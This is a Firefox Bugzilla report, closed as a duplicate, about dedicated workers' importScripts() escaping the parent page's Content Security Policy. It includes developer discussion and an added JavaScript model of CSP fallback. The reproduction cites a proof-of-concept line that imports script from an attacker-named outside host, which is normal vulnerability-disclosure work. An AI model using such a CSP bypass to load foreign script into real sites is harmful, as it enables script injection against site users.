Closed Bug 1413492 Opened 7 years ago Closed 2 years ago

importScripts is not governed by CSP set in a dedicated workers parent

Categories

(Core :: DOM: Security, defect, P3)

defect


RESOLVED DUPLICATE of bug 1320931

People

(Reporter: s.h.h.n.j.k, Unassigned)

References

(Blocks 1 open bug)

Details

(Whiteboard: [domsecurity-backlog2])

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36

Steps to reproduce:

1. Go to https://test.shhnjk.com/csp_external.html
2. Observe the "Message from attacker!"


Actual results:

importScripts("https://attack.shhnjk.com/worker.js") in the worker is not governed by either CSP script-src 'self' or worker-src 'self'.


Expected results:

2.4 of Changes from Level2 (https://w3c.github.io/webappsec-csp/#changes-from-level-2) says "Dedicated workers now always inherit their creator’s policy". Nightly now supports worker-src, so this should be blocked.
Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Group: core-security → dom-core-security
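An added illustration of the inheritance question in comment 0 (this is not Firefox code and not the reporter's test page): a deliberately small model of CSP3's directive fallback for worker loads and importScripts(), with a flag that switches between the worker inheriting its creator's policy and the worker running under no policy of its own. Only 'self', 'none', '*' and plain host-sources are modelled; nonces, hashes and path matching are assumed out of scope.

```javascript
// Added example, not Firefox code: a minimal model of CSP3 directive fallback for
// dedicated workers. Only 'self', 'none', '*' and host-sources are modelled.
const FALLBACK = {
  // CSP3 fallback chains: worker-src -> child-src -> script-src -> default-src
  'worker-src': ['worker-src', 'child-src', 'script-src', 'default-src'],
  'script-src': ['script-src', 'default-src'],
};

// Parses a Content-Security-Policy header value into { directive: [sources] }.
function parsePolicy(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Matches one source expression against a URL object (simplified matching).
function sourceMatches(expr, url, selfOrigin) {
  if (expr === "'none'") return false;
  if (expr === "'self'") return url.origin === selfOrigin;
  if (expr === '*') return true;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/]+)$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && scheme.toLowerCase() + ':' !== url.protocol) return false;
  return host.startsWith('*.') ? url.host.endsWith(host.slice(1)) : url.host === host;
}

// True when the fetch is permitted; no governing directive means no restriction.
function allows(policy, directive, urlString, selfOrigin) {
  const name = FALLBACK[directive].find(d => d in policy);
  if (name === undefined) return true;
  const url = new URL(urlString);
  return policy[name].some(expr => sourceMatches(expr, url, selfOrigin));
}

// The scenario from comment 0: the parent document carries the policy. With inherit=true
// the worker's importScripts() is checked under the parent's script-src (CSP3 behaviour);
// with inherit=false the worker has no policy of its own, which is the reported behaviour.
function workerImportAllowed({ parentPolicy, selfOrigin, workerUrl, importUrl, inherit }) {
  const policy = parsePolicy(parentPolicy);
  if (!allows(policy, 'worker-src', workerUrl, selfOrigin)) return { worker: false, import: false };
  const workerPolicy = inherit ? policy : {};
  return { worker: true, import: allows(workerPolicy, 'script-src', importUrl, selfOrigin) };
}
```

With the page's policy `script-src 'self'; worker-src 'self'` and the two hosts from the report, the model returns the import as blocked only when inheritance is on, which is the difference the bug is about.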
(In reply to Jun from comment #0)
> 2.4 of Changes from Level2
> (https://w3c.github.io/webappsec-csp/#changes-from-level-2) says "Dedicated
> workers now always inherit their creator’s policy". Nightly now supports
> worker-src, so this should be blocked.

FWIW, I dislike this spec change. People want to treat dedicated workers like subresources even though they create their own globals.

Anyway, is there a WPT for this?
Not sure we should consider this a security bug -- the spec is changing and every site / browser could be implementing a different level of support.
Flags: needinfo?(ckerschb)
(In reply to Daniel Veditz [:dveditz] from comment #2)
> Not sure we should consider this a security bug -- the spec is changing and
> every site / browser could be implementing a different level of support.

Yeah, this doesn't need to be a hidden bug. Whether this is desired behavior or not is debatable in my opinion. Either way, one would have to successfully launch a worker before one could even call importScripts. But I am open for discussions.

For the reference, worker-src was implemented within Bug 1302667.
Group: dom-core-security
Flags: needinfo?(ckerschb)
Blocks: csp-w3c-3
Status: UNCONFIRMED → NEW
Ever confirmed: true
Priority: -- → P3
Whiteboard: [domsecurity-backlog2]
Updating the title to reflect that this depends on CSP inheritance. I believe we do enforce CSP on importScripts() for CSP set directly on the worker script load headers.
Summary: importScripts is not governed by CSP → importScripts is not governed by CSP set in a dedicated workers parent
See Also: → 1685627
See Also: → 1740944

Duping this to the now invalid bug 1320931.

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE